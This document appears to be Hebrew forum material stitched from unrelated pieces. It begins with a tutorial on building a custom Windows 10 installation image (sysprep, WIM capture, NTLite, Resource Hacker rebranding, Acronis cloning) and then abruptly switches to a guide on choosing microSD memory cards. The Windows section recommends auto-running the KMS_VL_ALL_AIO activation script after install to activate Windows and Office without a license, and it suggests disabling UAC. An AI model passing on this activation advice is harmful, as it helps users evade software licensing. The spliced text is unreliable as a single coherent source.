לאחרונה העליתי מערכות הפעלה שהכנתי עבורכם, אני חייב לומר שקיבלתי מלא פידבקים וזה מאוד ריגש אותי ונותן לי כוח לעוד, חקרתי את הנושא שעות על גבי שעות עד שהגעתי לזה, אני מביא לפניכם את המדריך להכנת מערכת הפעלה חלומית משלכם עם הדרך הכי טובה לדעתי שקיימת ברשת.
הרשת מלאה בחומר הזה, ישנם עשרות דרכים שיטות והסברים איך לעשות את זה אך המדריך שלי מורכב מכמה שיטות יחד כדי לתת מענה מושלם למתחילים ומתקדמים כאחד, ולכן בחרתי להשתמש במכונה ווירטואלית כי לדעתי זה הרבה יותר נוח מכל דרך אחרת וחוסך הרבה זמן יקר כפי שאפשר לראות בהמשך.
וכמן כן השתדלתי להתעסק רק עם GUI (Graphical User Interface) כדי לתת צבע למדריך אבל למי שאוהב לכתוב ולהחכים זה קיים גם ב - CLI (Command Line Interface) .
בנוסף, אני מאוד ממליץ לא לאפשר חיבור לאינטרנט כדי למנוע בעיות של עדכוני דרייברים והתנגשויות.
המדריך רחוק להיות מושלם, ישנם כל כך הרבה דברים שאין סיכוי לעבור על כולם, בסוף האשכול אני יביא כמה מקורות ומדריכים דומים למי שרוצה להמשיך להעשיר את הידע שלו בנושא הזה.
מה דרוש לנו למדריך:
מכונה ווירטואלית (אפשר למצוא את התוכנה ברחבי הפורום והרשת או להיכנס לכאן.)
בוחרים מערכת הפעלה שאתם רוצים, אני בחרתי Windows 10 Version 21H2 (x64)
כעת מתקינים את המערכת הפעלה בהתקנה נקייה במכונה ווירטואלית, המדריך יעסוק כרגע בתוכנת VMware
מגדירים את המכונה להתקנה, מי שלא יודע איך עושים זאת יכול להיעזר בתמונות הבאות בספוילר.
אפשר לראות כמה מעבדים לוגים יש לי במנהל משימות ולפי זה לתת בהתאם למכונה ווירטואלית:
כעת אנו מפעילים את ההתקנה במכונה ועושים כך:
עדכון מערכת הפעלה לגירסא אחרונה
ב
אחרי שעשינו התקנה חשוב לעשות עדכוני מערכת, כבר הזכרתי בתחילת האשכול שאני לא ממליץ להתחבר לאינטרנט אז אני עושה עדכון מערכת ידני אופליין.
מי שלא יודע איך עושים זאת יכול להיעזר בתמונות הבאות בספוילר.
בודקים איזה גירסא יש למערכת הפעלה שלך ע"י הפעלת דו שיח "הפעלה" ומקישים winver
ומקבלים את התוצאות הבאות, אפשר להבין שזה מה שאני מחפש לפי הסוג מערכת שיש לי:
עכשיו אני מתקין את זה ובוחר "כן"
מחכה מעט זמן...
ואז עושה הפעלה מחדש למחשב בסיום ויש לנו מערכת מעודכנת אופליין.
התקנת תוכנות ורכיבים למערכת הפעלה
ג
עכשיו אתם מתקינים כל מה שאתה רוצים שיהיה כלול במערכת הפעלה החלומית שלכם.
אני מאוד ממליץ בנוסף על התוכנות שלכם להתקין רכיבים חיוניים למחשב, זה שוקל מעט יחסית והרווח כולו שלכם למנוע בעיות עתידיות.
במקרה שלנו בחרתי להתקין כמה תוכנות כפי שרואים בתמונה הבאה:
כמובן לא לשכוח לעשות הגדרות אישיות שאתם רוצים שיהיה למחשב שלכם כמו לבטל בקרת חשבון משתמש:
אחרי שסיימנו להתקין הכל אנו מכינים את המערכת הפעלה להתקנה חדשה הכוללת את התוכנות שלנו.
אז חשוב מאוד כדי לתת חוויה של חדש אנו בודקים איזה תוכנות יש באתחול ומנטרלים אותם.
כעת נמחק את כל החשבונות הקיימים במחשב מלבד חשבון מנהל
רק משהו קטן לפני זה...
אני רוצה לשמור את כל התוכנות שלי בתיקייה אחת מסודרת בשולחן עבודה אבל אם אני מוחק את חשבון המשתמש שלי אז כל התיקייה תיעלם.
במקרה כזה אני עושה כך:
יצרתי תיקייה של "תוכנות" ובתוכנה יש כל מיני קטגוריות:
כעת אני מעתיק את התיקייה "תוכנות" לנתיב הבא: (מצריך גישה לפריטים מוסתרים)
C:\Users\Default\Desktop
מעכשיו, כל חשבון משתמש חדש שנפתח במחשב יופיע אוטומט התיקייה שיצרתי.
עכשיו נעבור למחיקת כל החשבונות הקיימים...
מחיקת שאריות של כל המשתמשים במערכת הפעלה
ד
מפעילים את הקובץ הבא:
C:\Windows\System32\Sysprep\sysprep.exe
או ע"י פתיחת דו שיח "הפעלה" ולהקיש: %systemroot%/system32/sysprep/sysprep
לעשות לפי התמונה הבאה:
ולהמתין להפעלה מחדש של המערכת במצב מנהל:
כעת נעשה מחיקה לחשבונות הקיימים.
נכנסים להגדרות >מערכת >אודות >הגדרות מערכת מתקדמות או ע"י פתיחת דו שיח "הפעלה" ולהקיש: rundll32.exe sysdm.cpl,EditUserProfiles
חפשו את המשתמש שלכם במקרה שלנו זה "כללי", (זה שהוא אינו ה-Administrator (מנהל המערכת) ואינו הפרופיל ברירת מחדל), ואז למחוק את הפרופיל. כמובן שאם קיימים משתמשים נוספים במחשב יש להסיר גם אותם לפי השם של החשבון.
כעת נפעיל את ניהול המחשב ע"י Win + X ואז לבחור "ניהול מחשב"
או ע"י פתיחת דו שיח "הפעלה" ולהקיש: compmgmt.msc
חפשו את המשתמש שלכם במקרה שלנו זה "כללי", (זה שהוא אינו ה-Administrator (מנהל המערכת) ואינו אורח), ואז למחוק את הפרופיל. כמובן שאם קיימים משתמשים נוספים במחשב יש להסיר גם אותם לפי השם של החשבון.
למי שאוהב שינויים קוסמטיים ורוצה לשנות את הפתיח של המחשב כמו למשל:
יכול לעשות את זה ע"י הדרך הבאה
מעתיקים את הקובץ הבא לשולחן עבודה:
C:\Windows\System32\oobe\he-IL\msoobeFirstLogonAnim.dll.mui
ופותחים אותו באמצעות התוכנה Resource Hacker (הובא קישור בתחילת המדריך)
כעת נוכל לראות במחרוזות של הקובץ את כל הכיתוב שמופיע בתחילת יצירת חשבון משתמש חדש ונוכל לשנות כרצוננו.
לצורך המחשה בחרתי לכתוב במחרוזת 64 "שלום לכל המשפחה היקרה שלי" ובמחרוזת 65 "כמעט סיימנו למה אתה כל כך לחוץ"
עכשיו אני מעתיק את הקובץ הערוך לתיקיית המקור ומאשר החלפה וזהו:
עכשיו סיימנו לנקות את הכל ונפעיל את המערכת הפעלה לכניסה למוצר מוכן לשימוש (OOBE) של המערכת:
אזהרה: אין להפעיל את המערכת הפעלה אחרי פעולה זו.
לכל מי שחושש מאוד, לאחר הכיבוי מומלץ לבצע למכונה Snapshot שכן אם המכונה תדלק בטעות או לא תבצעו את התהליך נכון תוכלו לחזור לאותה הנקודה.
לעשות לפי התמונה הבאה:
להציב (mount) את המערכת הפעלה לכונן דיסקים
ה
בקטע הזה ישנם הרבה דרכים מגוונות, אני בחרתי בדרך הקלה ביותר והנוחה ביותר.
כעת אנו לוקחים את המערכת הפעלה שנמצאת במכונה ווירטואלית ומציבים אותה לכונן דיסקים רגיל.
המערכת הפעלה שלנו יודעת להציב קבצי VHD לכונן דיסקים:
אך דא עקא שהמערכת הפעלה שנמצאת במכונה זה בכלל סיומת אחרת שלא נתמכת (VMDK).
במקרה כזה יש אפשרות להמיר את הסיומת הזאת לסיומת VHD ואז המערכת תוכל לקרוא אותו.
בשביל להמיר צריכים להוריד Vmdk2Vhd Vmdk2Vhd-1.0.13.rar
מקור - אתר הבית של התוכנה
אבל אני חשוב שמומלץ יותר להשתמש בתוכנה הבאה, דרכה נוכל להציב את המוכנה לכונן דיסקים:
מפעילים את התוכנה osfmount (הובא קישור בתחילת המדריך)
ונעשה לפי התמונות הבאות:
עכשיו נוכל לראות כונן דיסקים של מערכת הפעלה שנמצאת במכונה:
ללכוד (Capture) את המערכת הפעלה לקובץ אחד (WIM)
ו
גם בקטע זה ישנם הרבה שיטות ומדריכים, בחרתי בדרך הפשוטה עם ממשק נוח וברור בלי צורך לכתוב כל מיני קודים למיניהם.
מפעילים את התוכנה WinToolkit (הובא קישור בתחילת המדריך)
ועושים כך:
בוחרים איפה לשמור את הלכידה של המערכת ושומרים את זה בשם "install" :
בוחרים את הכונן דיסקים של המערכת הפעלה שהצבנו:
כאן תבחרו שם שיופיע על המערכת הפעלה בהתקנה:
כעת נעשה ניקוי יסודי של כל מיני דברים מהערכת הפעלה, אני בחרתי בניקוי הבא אני ממליץ לא לנקות משהו שלא יודעים.
כעת אחרי שסיימנו להגדיר הכל נלחץ על Capture :
זהו, עכשיו יש לנו קובץ WIM מוכן עם כל ההגדרות שלנו בפנים וזה הזמן לעבור לקטע הבא.
להכניס את הקובץ במערכת הפעלה קיימת
ז
עכשיו אנחנו רוצים להכניס את המערכת הפעלה שלנו (קובץ WIM) לתוך התקנה של מערכת הפעלה כדי לשפוך את הקובץ שלנו.
ניגשים למערכת הפעלה חדשה שהורדנו, ומחלצים אותה לתיקייה:
לוקחים את הקובץ WIM שלנו ומחליפים אותו בתיקיית sources שנמצאת בהתקנת מערכת הפעלה ומאשרים החלפה:
עכשיו נסגור את הדיסק בחזרה לקובץ ISO כפי שהיה במקור.
רק לפני זה, יש כמה דברים שחשוב ללמוד בשלב זה.
מפעילים את התוכנה NTLite (הובא קישור בתחילת המדריך)
וגוררים את התיקייה sources לתוכנה , ומטעינים את הקובץ:
כעת נפתח לפנינו ים של אפשרויות לשחק עם המערכת הפעלה, יש שם כלים מאוד מתקדמים וחשוב לא לעשות כלום בלי להבין מה אתה בדיוק עושה.
אני הולך להסביר רק כמה דברים קטנים ואולי בהמשך אפשר יותר להאריך.
ובכן, אני רוצה להגדיר במערכת הפעלה שהסמלים של שולחן עבודה יהיו גדולים וכן שיופיע המחשב שלי בתור ברירת מחדל וגם אני מעוניין בערכת נושא שחורה אז אני עושה כך:
החלק הבא הוא החלק כמעט הכי עסיסי לכל בונה מערכת הפעלה, מדובר בהגדרה שאתה נותן למערכת הפעלה מה לקפוץ אחרי שההתקנה נגמרה.
רובם מכניסים כאן את האקטוב של מערכת הפעלה והאופיס, ויש כאלה שבנו איזה סקריפט משלהם ונתנו פקודה להפעיל את הסקריפט אחרי שההתקנה נגמרה וכן על זה הדרך.
יוצרים כמה תיקיות בתיקיית sources שנמצאת במערכת הפעלה
OEM$ > $$ > SETUP > SCRIPTS$
ושם מכניסים את הסקריפטים שאתה רוצה להפעיל
וזה נראה כך:
דוגמה נפוצה זה הפקודה הבאה לאקטב את המערכת הפעלה אוטומטי: dp0"KMS_VL_ALL_AIO.cmd~%"
עוד דוגמאות:
אחרי שסיימנו להגדיר את הכל נשאר לו רק לדחוס את הקובץ שלנו לסימות ESD כדי לכווץ את הנפח של כל התוכנות ולסגור את הקובץ בחזרה ל ISO.
ולכן אנו מגדירים כך:
בוחרים שם למערכת הפעלה שלנו:
ולסיום לוחצים כאן ליצירת מערכת הפעלה מוגמרת:
וזהו, יש לנו מערכת הפעלה מוכנה עם התוכנות שלנו, ונשאר עכשיו רק לבדוק במכונה ווירטואלית אם הכל תקין וכל השינויים שעשינו אכן קיימים וזה הזמן לעבור לחלק הבא.
לערוך את קובץ התקנה של מערכת הפעלה
ח
עכשיו אחרי שיש לנו מערכת הפעלה מותאמת אישית, הגיע הזמן לקצת קוסמטיקה להתקנה כדי לייחד את המערכת הפעלה עוד יותר.
אנו מחלצים את המערכת הפעלה שלנו לתיקייה:
גוררים את התיקייה sources לתוכנה , ומטעינים את הקובץ של קובץ ההתקנה לפי התמונה:
כעת נעשה סייר על הקובץ התקנה שהטענו כך:
ואז אנו מקבלים את המסך הבא:
עכשיו שימו לב, כל תמונה במערכת הפעלה מתחלקת לכל מיני מקומות בקבצים, ועכשיו נסביר איזה קובץ משנה כל תמונה.
לדוגמא, אני רוצה שיהיה את התמונה הזאת במערכת הפעלה בהתחלה:
אז קודם כל אני צריך לוודאות שזה קובץ תמונה בסיומת BMP , ואם לא אז לעשות המרה לסיומת כזאת:
כעת אני לוקח את התמונה שאני רוצה ונותן לה שם setup
ואז אני ניגש לקובץ הבא שנמצא בקובץ התקנה
Windows\System32\setup.bmp
ומחליף את התמונה שלי בתמונה הקיימת שם ומאשר החלפה.
שימו לב, אתם תקבלו שגיאה שאי אפשר לערוך קובץ זה בגלל חוסר הרשאות:
יש הרבה פתרונות לבעיה הזאת, הפשוטה והמהירה שאני מכיר זה לקחת בעלות על כל התיקייה של קובץ התקנת מערכת הפעלה כי יש לנו עוד הרבה שינויים לעשות אז חבל להיתקע כל פעם בגלל חוסר הרשאות.
עכשיו ניגשים לתיקיית ההתקנה של מערכת הפעלה ולקחים עליה בעלות:
אחרי סיום התהליך יש אפשרות לערוך את הקבצים בלי בעיות כפי שהסברנו למעלה.
כעת אני לוקח את אותה התמונה (או אחרת) שאני רוצה ונותן לה שם background
ואז אני ניגש לקובץ הבא שנמצא בקובץ התקנה
sources\background.bmp
ומחליף את התמונה שלי בתמונה הקיימת שם ומאשר החלפה.
עכשיו ניגשים לקבוץ הבא:
sources\spwizimg.dll
ופותחים אותו באמצעות התוכנה Resource Hacker (הובא קישור בתחילת המדריך)
אחרי זה ניגשים למספר 517:1033 ועושים החלפה של תמונה ע"י קיצור מקשים או קליק ימיני:
עכשיו יש אפשרות להחליף את התמונה הקטנה שעליה יש את כל התהליך של ההתקנה.
אני אוהב מאוד חלונות זכוכית אז חשבתי לשתף אתכם באחד כזה ולהחליף אותו בקובץ ההתקנה.
אחרי זה ניגשים למספר 516:1033 ועושים החלפה של תמונה ע"י קיצור מקשים או קליק ימיני:
ולסיום נלחץ של שמירה:
עכשיו יש לנו קובץ התקנת מערכת הפעלה עם תמונות שבחרנו.
הערה חשובה:
בגלל שזה התקנת מערכת הפעלה בעברית אז יש בעיה אם אתה רוצים לכתוב טקסט.
לדוגמא, כתבתי את הטקסט הבא בתמונה והכנסתי לקובץ התקנה, שימו לב איך זה נראה הפוך:
הפתרון נורא פשוט, לוקחים את התמונה שערכנו עם הטקסט והפכים אותו בכל עורך תמונות פשוט.
אין צורך להפוך את התמונה של קובץ setup.bmp , רק להפוך את התמונות של הקבצים background.bmp spwizimg.dll .
אני בחרתי בעורך של ווינדוס:
אחרי שהפכנו את התמונה אפשר לראות שהכל תקין ונראה מעולה:
עד עתה עסקנו בתמונות של ההתקנה, עכשיו נעסוק בשינוי של כמה משפטים מתוך ההתקנה בשביל זה צריך לערוך כמה מחרוזות בקבצים הבאים.
ניגשים לקבוץ הבא:
sources\he-IL\setup.exe.mui
ופותחים אותו שוב באמצעות התוכנה Resource Hacker
אפשר לראות במחרוזות שם כל מיני דברים שתוכלו לערוך כמו למשל "ההתקנה תיכף מתחילה אנא המתן בבקשה"
גם בקובץ הבא יש הרבה דברים לערוך
sources\he-IL\w32uires.dll.mu
בקובץ הבא יש אפשרות לערוך כמה משפטים בתחילת ההתקנה
sources\he-IL\spwizres.dll.mui
בחרתי להכניס את המשפט "windows 10 pro by user" וככה זה נראה:
וגם בקובץ הבא:
sources\he-IL\arunres.dll.mui
אני חושב שהעיקרון מובן, אין צורך לעבור על הכל עכשיו כי זה הרבה מחרוזות, אפשר לראות כל קובץ מה הוא מכיל ולשנות לפי זה למה שנוח לך.
אחרי שסיימנו את כל העריכה אנחנו שומרים את הכל בתוכנה כדלהלן:
בדיקת מערכת הפעלה במכונה ווירטואלית
ט
אוקי חברים, אחרי שעבדנו קשה וערכנו עשרות הגדרות והמון תוכנות וכל מיני שינויים נשאר רק לברר אם הכל תקין ועובד מושלם בדיוק לפי שהגדרנו.
זה הזמן להריץ את המערכת הפעלה שלנו במכונה ווירטואלית ולבדוק אם הכל כהלכתו.
נושאים קשורים
י
אני מביא כמה קישורים של אתרים כדי להעשיר את הידע בתחום הזה:
ראיתי הרבה פניות בפורום לגבי יצירת אימג' מוכן וכן התקנת אימג' על מחשב חדש וכן קיבלתי מלא הודעות בנושא הזה, אז חשבתי להעלות את הדברים על הכתב למען תעלת הכלל.
ראשית כל, אסור להיות מחוברים לאינטרנט בשלב זה.
מתקינים ווינדוס 10 (כל אחד והגירסא שהוא אוהב אני בחרתי גירסת 2004) ואחרי זה מתקינים את כל התוכנות שאתה מעוניין שיהיו בווינדוס כמו אופיס, אנטי וירוס, מצגות, פורמט פקטורי וכן הלאה.
אין צורך לאקטב את המערכת הפעלה ואת האופיס מכיוון שבמחשב החדש תצטרכו לעשות את זה שוב.
אני ממליץ להתקין גם רכיבים נחוצים (זה לא דרייברים).
אין לעדכן שום דרייבר במחשב מכיוון שבכל מחשב יש לו את הדרייברים שלו ואנחנו רוצים אימג' שיהיה תקין לכל המחשבים בלי התנגשויות בדרייברים.
אחרי שסיימנו להגדיר את המחשב, מבצעים איחוי לכונן. יש הרבה מאמרים שעוסקים בחומרת איחוי לכונן SSD ולכן אני לא מחייב אף אחד לעשות, אבל בלי לבצע איחוי זה יכול לגרום לבעיה בהתקנת האימג' על מחשב חדש במקרה והוא כונן יותר קטן. מי שלא הבין אותי יכול לדלג על שלב זה בלי לבצע איחוי.
יוצרים אימג' דרך תוכנת Acronis True Image, אפשר למצוא את התוכנה ברחבי הרשת או הפורום או להיכנס לכאן
אני בחרתי לעשות אימג' בגירסת 2019 כי הסיומת של האימג' הוא TIB ובגירסאות החדשות זה סיומת TIBX והוא פחות נח.
בחרתי לעשות את זה דרך דיסק טכנאים של Sergei Strelec לפי השלבים הבאים:
מורידים את הדיסק טכנאים - אפשר למצוא את הדיסק ברחבי הרשת או הפורום או להיכנס לכאן.
צורבים אותו על התקן נשלף ומעלים אותו בביוס על המחשב שהתקנו את כל התוכנות.
עושים לפי התמונות הבאות:
בוחרים את כל המחיצות שנמצאות על המערכת הפעלה כמו זה:
כאן אתם מתבקשים איפה לשמור את האימג':
אני ממליץ לשמור אותו על התקן נשלף של מערכת קבצים FAT32 כדי שהוא יתמוך בכל ההתקנים נשלפים, והקובץ מתחלק לכמה חלקים שאינם עולים על גודל של 4 GB כמו כאן:
אחרי שבחרנו מיקום לשמירה אנחנו מבצעים את התהליך (לוקח קצת זמן, כל אחד והמהירות שלו)
כעת יש לנו את הקבצים מוכנים בהתקן נשלף, ואנחנו רוצים לשפוך את הכל למחשב חדש.
אנחנו ניגשים למחשב החדש, מכניסים את ההתקן נשלף שכולל בתוכו דיסק טכנאים והאימג' שלנו, ומעלים את הדיסק טכנאים בביוס ועושים לפי השלבים הבאים:
אם יש לכם את האימג' בהתקן נשלף, זה אמור לקפוץ אוטומטי לתוכנה:
ואם אתם לא רואים כלום, פשוט תנווטו דרך התוכנה למיקום השמירה של האימג' שלכם:
כעת נמשיך לשלב שאנחנו רוצים לשפוך את כל המחיצות בשלימותן:
בוחרים את הדיסק שאתם רוצים לשפוך את האימג': אזהרה - כל החומר הקיים בדיסק זה יימחק
אחרי שהגדרנו הכל אנחנו לוחצים על "Proceed" :
כאן תוכלו לראות את תהליך הצריבה של האימג' למחשב החדש, במחשב שלי זה לקח 6 וחצי דקות!!!
אחרי זה מקבלים את ההודעה הבאה, זה אומר שהפעולה בוצעה בהצלחה:
עכשיו מפעילים את המחשב מחדש ומוציאים את ההתקן נשלף מהמחשב (לא חייב)
המערכת מעדכנת את הנתונים של האימג' במחשב החדש, ואז אחרי כמה דקות תראו את מסך הכניסה עם שם המשתמש שבחרתם במחשב הישן ועם כל התוכנות שהתקנתם עליו.
כעת צריך רק לאקטב את מערכת הפעלה והאופיס, וזהו!!!
אימג' מוכן להורדה
מי שלא הבין איך יוצרים אימג', או כאלה שאין להם כח מכל מיני סיבות, החלטתי להעלות אימג' שהכנתי (לפני שנה בערך) שיש בפנים את כל הרכיבים הנחוצים ואופיס 2019 ועוד מלא מלא הגדרות ותוכנות שהגדרתי בשעתו:
הפלאפון, הטאבלט, המצלמה, מצלמת הרכב, מצלמת האבטחה, נגן המוזיקה או האוזניות…כל כך הרבה שימושים לכרטיסי זיכרון, אבל איך בוחרים אחד טוב ומשתלם?
בכל בית תמצאו לא מעט כרטיסי זיכרון, גדולים וקטנים, כאלו שקיבלתם עם המכשיר/מצלמה הישנה וכאלו שנקנו בארץ וכאלו שנקנו מאיביי/עליאקספרס והתגלו כמזוייפים…
במדריך זה נענה (בין השאר) על השאלות הבאות:
אז איך בוחרים כרטיס טוב?
מה מתאים למכשיר/מצלמה שלכם?
מה לגבי מצלמת אבטחה או רכב?
איך מוודאים שקונים מקורי ואמין ושלא ימחקו לנו פתאום כל התמונות והקבצים?
האם לקנות בארץ או בחו"ל ומה אומרים כל הסימונים האלו על הכרטיס?
סוג הכרטיס
בעבר הלא רחוק בכלל היו לא מעט כרטיסים בשוק. מיני, מיקרו, קומפקט פלאש ועוד רבים. רק החזקים (והזולים) ביותר שרדו, הלא הם הSD וה MICRO SD:
כולנו מכירים את שני הסוגים היטב ויודעים שמרבית המצלמות והמחשבים מקבלים את הSD (הגדול), בעוד מרבית המצלמות הקטנות יותר, מכשירי סלולר וכד' מקבלים את המיקרו הקטן.
המיקרו הוא התקן הנפוץ והשימושי יותר היום (ויותר מיום ליום) ותמיד אפשר 'להמיר' אותו לגודל SD מלא עם מתאם זול ופשוט (שלרוב כלול באריזה ממילא), כך שגם אם יש לכם מצלמה יקרה שדורשת כרטיס SD מהיר במיוחד – אין מה לחשוש! המתאם לא פוגע במהירות הכרטיס כלל!
לכן המסקנה המתבקשת היא – העדיפו כרטיסי MICRO SD על פני SD!
נפח הכרטיס
חלקכם אולי צנועים ומסתפקים במועט אולם כפי שאמרנו לעיל – כרטיס זיכרון הוא דבר רב שימושי. ייתכן כי כרגע אתם צריכים רק 8GB אך במכשיר הבא, כנראה שכבר תצטרכו יותר. גם אם אין לכם אוסף שירים מכובד, במוקדם או במאוחר, – כמה שיותר – יותר טוב.
אבל…לא יותר מידי!
חשוב גם לבדוק את נתוני המכשיר המיועד. מכשירים ומצלמות רבות תומכים רק ב32GB למשל. לא פעם תמצאו שעם פירמוט נכון של הכרטיס, הם יתמכו גם ב64GB ואף 128GB אולם אין כל הבטחה כי אכן יעבדו, לכן היצרנים מעדיפים להתחייב ל32GB בלבד.
כרטיסים עד נפח של 32GB – יכונו SDHC, ומ64GB ומעלה – SDXC.
לפיכך, המסקנה פשוטה –
אל תטרחו עם כרטיסי 4/8/16GB – אלו כרטיסים קטנים מידי, לרוב איטיים ומסדרות ייצור ישנות.
העדיפו נפח של 32GB, בעיקר למצלמות אבטחה, רכב וכד'. אם מדובר במכשיר סלולרי/מצלמה עדכנית (ולאחר שווידאתם את המפרט) – העדיפו 64GB!
אם אתם רוצים להתפנק ולא לדאוג למקום בכלל – קחו כמובן את ה128GB. אם אתם שואלים את עצמכם מי צריך כל כך הרבה על כרטיס אחד?
התשובה היא כולם! לי יש כבר עשרות כרטיסי 32 ו64GB אבל כרטיס אחד של 128GB יושב קבוע אצלי במצלמה והנגן וזהו – כבר לא צריך להוציא, לפנות, להחזיר, לפרמט, לסדר…תמיד יש מקום בשפע ולא צריך לחשוב פעמיים כשיוצאים מהבית אם פינינו את הכרטיס או לא.
מה עם כרטיסי 200GB ויותר? ודאו היטב כי אלו נתמכים במכשירכם.
מהירות הכרטיס
כרטיסי זיכרון באים בשלל תקנים ומהירויות. איך נדע מה כדאי לנו והאם כדאי לשלם יותר על כרטיס בתקן כזה או אחר?
קודם נבין את המושגים:
CLASS
ה'תקן' הראשון והמוכר יותר נקרא 'Class' והוא מתייחס למהירות הכתיבה המינימלית המובטחת. בכתיבה הכוונה לשמירה בפועל, קרי כתיבה של מידע חדש לכרטיס, כמו לדוגמא שמירת תמונה, סרטון, העתקת קבצים לכרטיס וכד', וזאת להבדיל ממהירות קריאה המתייחסת לכמה מהר ניתן לגשת למידע שעל הכרטיס, כמו לדוגמא להציג את התמונות בגלריה, לנגן את הסרטון וכד'. הסטנדרט הנפוץ ביותר היום הוא CLASS 10. כלומר, אם כרטיס עם CLASS 10 יהיה עם מהירות כתיבה של לפחות 10 MB/s, כרטיס עם CLASS 2 יהיה עם לפחות 2 MB/s וכן הלאה:
בימינו כבר אין כרטיסים חדשים שהם פחות מ CLASS 10. זהו המינימום הנדרש והפרשי המחיר זניחים.
אם קיבלתם בשנים האחרונות כרטיס יחד עם המצלמה או הטלפון, או שיש לכם עדיין כרטיסים ישנים במכשיר, סביר להניח שהם לא CLASS 10, וייתכן מאוד כי הם מאטים לכם את המכשיר/מצלמה אז כדאי מאוד לעלות כיתה
UHS
UHS הוא תקן חדש יותר (מלשון ULTRA HIGH SPEED) המוסיף עוד ערוץ חיבור מהיר המאפשר להעברת מידע מהירה יותר באופן משמעותי.
איפה תקן UHS חשוב? בעיקר בצילום. אם אתם רוצים לצלם ברצף, לצלם בהילוך איטי או ב 4K, כדאי מאוד לבחור בכרטיס עם UHS.
בתקן ה UHS יש רק 2 דרגות נפוצות – UHS-1 ו UHS-3
אחלה, אז פשוט נקנה כרטיס שהוא קלאס 10 ו UHS-3 ואנחנו מסודרים, נכון?
לא בדיוק, בפועל לא כל המכשירים והמצלמות תומכים ב UHS-3, וגם אלו שכן תומכים על הנייר, לא תמיד מסוגלים לעשות בו שימוש. לכל מכשיר יש מגבלות זיכרון ומעבד פנימיות, ואפילו מצלמות מקצועיות ומודרניות לא תמיד מסוגלות לשמור במהירות המירבית שמציעים כרטיסי ה U1 שלא לדבר על U3.
אז לרוב, אלא אם אתם צלמי חתונות ווידאו הקפיצה במחיר לכרטיס U3 לא תמיד תשתלם ואולי תוכלו לחסוך כמה גרושים עם כרטיס U1.
עם זאת, עם ההתקדמות של כלל הטלפונים והמצלמות לצילום ב4K, מאוד כדאי לבחור בכרטיס מהיר ככל הניתן.
אם כל זה לא מבלבל מספיק, הנ"ל קובע את מהירות התקן, אך בנוסף יש גם סיווג ממשק הUHS עצמו, והוא מתחלק לUHS-1 וUHS-2 ואלו דווקא מסומנים על הכרטיס ב I אחת או כפולה – II.
כרטיסים עם UHS-2 הם יקרים ונדירים ומעטים המכשירים שתומכים בUHS-2. כרטיסים אלו מיועדים בעיקר למצלמות מקצועיות. הייחוד הוא בשורת מגעים נוספת על הכרטיס –
כלומר, אלא אם אתם מתכוונים לצלם סרט IMAX בקרוב, אין כרגע הצדקה להשקיע בכרטיס בתקן UHS-II – לא רק שסביר שלא תרגישו בהבדל המהירות אלא שסביר שהמכשיר/מצלמה שלכם גם לא תומכת בכך עדיין.
VIDEO SPEED CLASS
התקן החדש ביותר מתייחס בפרט לוידאו. כאמור הצילום ב4K ואף גבוה מכך דורש כרטיסים מהירים במיוחד מאחר וקבצי הוידאו הופכים לגדולים מאוד. תקן זה מסומן על ידי האות V ומספר דו ספרתי – 60, 90 וכד'. תקן זה חשוב בעיקר אם אתם צלמים מקצועיים שמצלמים ב4K ומעלה (או משתמשים בכרטיס ככונן בטאבלט).
X333, X600…
חלק מהיצרנים משתמשים גם בדירוג משלהם. אלו בעיקר LEXAR וסאנדיסק. דירוג זה אינו אחיד בין כל המותגים וממילא נרשם רק כתוספת לדירוג התקני הנפוץ לעיל לכן לא נתייחס אליו.
הנה סיכום של כל התקנים:
סיכום ביניים:
נעדיף כרטיס מיקרו SD, בנפח 32GB ומעלה, בתקן CLASS 10 וU-1 לפחות. מאחר ותקן U1 כבר ממילא תומך במהירות של CLASS 10, כל שעלינו לוודא בבחירת מהירות הכרטיס היא כי הסימונים U1 או U3.
U1 = מעולה לשימוש כללי, מהיר וזול.
U3 = אם הכרטיס מיועד לצילום במצלמת 4K, מכשיר דגל עדכני וכד' – נעדיף כרטיס בתקן U3.
טוב הבנו הבנו.
יש הרבה תקנים ומהירויות, אבל הרי כולם יעבדו טוב מספיק בטלפון, במחשב, בטאבלט ובמצלמה כדי לשמור מידע, תמונות, סרטונים ומוזיקה, אז למה בכלל כדאי לקנות כרטיס כמה שיותר מהיר?
פשוט מאוד, ככל שהכרטיס מהיר יותר, כך חוויית השימוש שלכם תשתפר!
העברת קבצים אל ומהכרטיס תקח פחות זמן! משחקים יעלו מהר יותר! תוכלו לנגן סרטים באיכות גבוהה בלי קרטועים וגמגומים! תוכלו לחפש קבצים במהירות ועוד ועוד.
מקורי או מזויף?
כרטיסי זיכרון זוכים לכבוד המפופק של כוכבי הזיופים. רמת הזיופים כל כך גבוהה ונפוצה שכמעט בלתי אפשרי להבחין היום בין זיוף למקור ללא בדיקה מעמיקה. ברשת תמצאו שלל 'מדריכים' והשוואות על זיהוי זיופים. גוון הצבע פה, חותמת מסויימת שם וכן הלאה.
רבותי – מניסיון – הרוב פשוט שטויות. כבר קיבלתי כרטיסים מקוריים ותקינים לחלוטין שעל פי ההשוואות הללו אמורים להיות מזוייפים, ולהפך. גם אמצעי הגנה מזיופים כמו מדבקות הולגרמה כבר מזוייפות היום בקלות.
הבעיה כל כך חמורה שאפילו החנויות עצמן לא תמיד יודעות אם מה שהן מוכרות הוא אכן מקורי ותקין – כן, גם בארץ!
אז איך קונים כרטיס מקורי ולא נופלים בפח?
קונים מחנויות טובות ומבוססות, עם פייפאל כגון mymemory, DX, BangGood, GearBest, Amazon.
חנויות אלו דואגות מאוד למוניטין שלהן והדירוג בפייפאל ולכן לא מתעסקות עם זיופים כלל! היה וקיבלתם, איכשהו, זיוף, תקבלו כמובן פיצוי מלא.
מרגישים אמיצים/קמצנים ורוצים להמר על מוכר בעליאקספרס/איביי?
קחו בחשבון שאמנם יש מוכרים מעולים באתרים אלו, אולם מנהג נפוץ, גם של מוכרים בדירוג גבוה, הוא לשלוח זיוף רק אחת ל- X עסקאות. כלומר ייתכן מאוד ותראו לא מעט תגובות וביקורות חיוביות, אך דווקא כשאתם תזמינו, ייתכן ותיפלו על זיוף. שיטה זו קלה ופשוטה למוכר לקיים – גם להרוויח היטב משליחת זיופים מידי פעם במחיר מלא, וגם עשרות דירוגים חיובים המסתירים כל ביקורת שלילית, אם תבוא.
אין זה אומר שאי אפשר לקנות באתרים אלו כמובן, אלא רק שיש בכך סיכון גבוה יותר לזיוף, לרוב אין אחריות ויש לבדוק היטב את דירוג המוכר – אל תתפתו למחירים זולים מידי!
הכרטיס הגיע? ערכו בדיקת תקינות.
